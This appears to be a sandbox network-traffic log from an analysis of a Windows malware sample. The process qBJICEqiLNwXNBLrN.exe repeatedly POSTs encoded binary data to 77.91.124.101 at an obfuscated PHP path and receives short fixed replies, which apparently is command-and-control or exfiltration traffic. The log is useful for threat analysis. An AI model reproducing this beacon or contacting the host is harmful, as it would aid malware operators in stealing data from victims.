Nov 21, 2023 04:47:41.249264956 CET	235	OUT	Data Raw: 57 58 58 5e 5e 5a 5a 59 5d 57 55 57 55 5c 57 52 50 5c 58 48 56 5f 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXX^^ZZY]WUWU\WRP\XHV_W[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=)_=+:W=#8,Z 99Y(3&-2W00::;=? ,&G''^)/
Nov 21, 2023 04:47:41.453973055 CET	235	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	77.91.124.101	80	192.168.2.5	49736	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:41.808120012 CET	236	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:42.007024050 CET	236	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:42.171473026 CET	239	OUT	Data Raw: 57 5d 58 5f 5b 5f 5f 59 5d 57 55 57 55 56 57 50 50 59 58 44 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]X_[__Y]WUWUVWPPYXDVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=;)Y?;>)3.'%#:5^?5'.1$>S.+6^?//>&G''^)
Nov 21, 2023 04:47:42.377120018 CET	239	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49736	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:41.808120012 CET	236	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:42.007024050 CET	236	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:42.171473026 CET	239	OUT	Data Raw: 57 5d 58 5f 5b 5f 5f 59 5d 57 55 57 55 56 57 50 50 59 58 44 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]X_[__Y]WUWUVWPPYXDVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=;)Y?;>)3.'%#:5^?5'.1$>S.+6^?//>&G''^)
Nov 21, 2023 04:47:42.377120018 CET	239	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	77.91.124.101	80	192.168.2.5	49738	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:44.099560022 CET	241	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:44.297482967 CET	241	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:44.297697067 CET	243	OUT	Data Raw: 57 59 58 5e 5b 59 5f 5e 5d 57 55 57 55 5e 57 53 50 58 58 41 56 51 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYX^[Y_^]WUWU^WSPXXAVQW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_=2((.=#7Z8\"*%X?U>3-2'--?<4,&G''^)/
Nov 21, 2023 04:47:44.501955986 CET	244	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49738	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:44.099560022 CET	241	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:44.297482967 CET	241	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:44.297697067 CET	243	OUT	Data Raw: 57 59 58 5e 5b 59 5f 5e 5d 57 55 57 55 5e 57 53 50 58 58 41 56 51 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYX^[Y_^]WUWU^WSPXXAVQW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_=2((.=#7Z8\"*%X?U>3-2'--?<4,&G''^)/
Nov 21, 2023 04:47:44.501955986 CET	244	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49739	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:44.819467068 CET	244	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:45.015990973 CET	245	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:45.016554117 CET	247	OUT	Data Raw: 57 5b 58 5d 5b 5a 5a 58 5d 57 55 57 55 57 57 56 50 5a 58 41 56 53 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[X][ZZX]WUWUWWVPZXAVSW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>=[=+.U>0+[8% )\)3:P$S&#1-;.?Z;Y8>&G''^)
Nov 21, 2023 04:47:45.219712019 CET	247	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	77.91.124.101	80	192.168.2.5	49739	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:44.819467068 CET	244	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:45.015990973 CET	245	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:45.016554117 CET	247	OUT	Data Raw: 57 5b 58 5d 5b 5a 5a 58 5d 57 55 57 55 57 57 56 50 5a 58 41 56 53 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[X][ZZX]WUWUWWVPZXAVSW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>=[=+.U>0+[8% )\)3:P$S&#1-;.?Z;Y8>&G''^)
Nov 21, 2023 04:47:45.219712019 CET	247	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49740	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:45.569263935 CET	248	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:45.768819094 CET	248	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:45.769048929 CET	251	OUT	Data Raw: 57 50 5d 5c 5e 5d 5a 5b 5d 57 55 57 55 5e 57 50 50 52 58 45 56 56 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]\^]Z[]WUWU^WPPRXEVVWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')(+2V)U+]/'%4X(63-&V33>V98)?<?Y,&G''^)+
Nov 21, 2023 04:47:45.981430054 CET	251	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	77.91.124.101	80	192.168.2.5	49740	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:45.569263935 CET	248	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:45.768819094 CET	248	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:45.769048929 CET	251	OUT	Data Raw: 57 50 5d 5c 5e 5d 5a 5b 5d 57 55 57 55 5e 57 50 50 52 58 45 56 56 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]\^]Z[]WUWU^WPPRXEVVWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')(+2V)U+]/'%4X(63-&V33>V98)?<?Y,&G''^)+
Nov 21, 2023 04:47:45.981430054 CET	251	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	77.91.124.101	80	192.168.2.5	49741	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:46.303026915 CET	252	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:46.500907898 CET	253	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:46.507325888 CET	255	OUT	Data Raw: 57 5e 5d 5a 5e 59 5a 50 5d 57 55 57 55 5d 57 5b 50 5b 58 42 56 53 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^]Z^YZP]WUWU]W[P[XBVSW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$^?].R=U;Z8$&#:!Y+3"P&02:]"Y<,->&G''^)+
Nov 21, 2023 04:47:46.712269068 CET	256	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49741	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:46.303026915 CET	252	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:46.500907898 CET	253	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:46.507325888 CET	255	OUT	Data Raw: 57 5e 5d 5a 5e 59 5a 50 5d 57 55 57 55 5d 57 5b 50 5b 58 42 56 53 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^]Z^YZP]WUWU]W[P[XBVSW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$^?].R=U;Z8$&#:!Y+3"P&02:]"Y<,->&G''^)+
Nov 21, 2023 04:47:46.712269068 CET	256	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49742	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:47.052269936 CET	256	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:47.251118898 CET	257	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:47.251475096 CET	259	OUT	Data Raw: 52 5f 58 5c 5b 53 5f 5d 5d 57 55 57 55 5d 57 56 50 58 58 45 56 5f 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X\[S_]]WUWU]WVPXXEV_WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>(+89)3+,7?0:'=3W::^<#Y,&G''^)+
Nov 21, 2023 04:47:47.460270882 CET	259	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	77.91.124.101	80	192.168.2.5	49742	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:47.052269936 CET	256	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:47.251118898 CET	257	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:47.251475096 CET	259	OUT	Data Raw: 52 5f 58 5c 5b 53 5f 5d 5d 57 55 57 55 5d 57 56 50 58 58 45 56 5f 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X\[S_]]WUWU]WVPXXEV_WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>(+89)3+,7?0:'=3W::^<#Y,&G''^)+
Nov 21, 2023 04:47:47.460270882 CET	259	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49715	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:28.130729914 CET	154	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:28.329854012 CET	155	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:28.330218077 CET	157	OUT	Data Raw: 52 5a 5d 5a 5b 53 5f 5a 5d 57 55 57 55 59 57 50 50 5a 58 49 56 54 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ]Z[S_Z]WUWUYWPPZXIVTW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);)^?!* 86\4\)( !'==0V!-89+?;8&G''^)
Nov 21, 2023 04:47:28.534405947 CET	158	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	77.91.124.101	80	192.168.2.5	49715	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:28.130729914 CET	154	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:28.329854012 CET	155	IN	HTTP/1.1 100 Continue
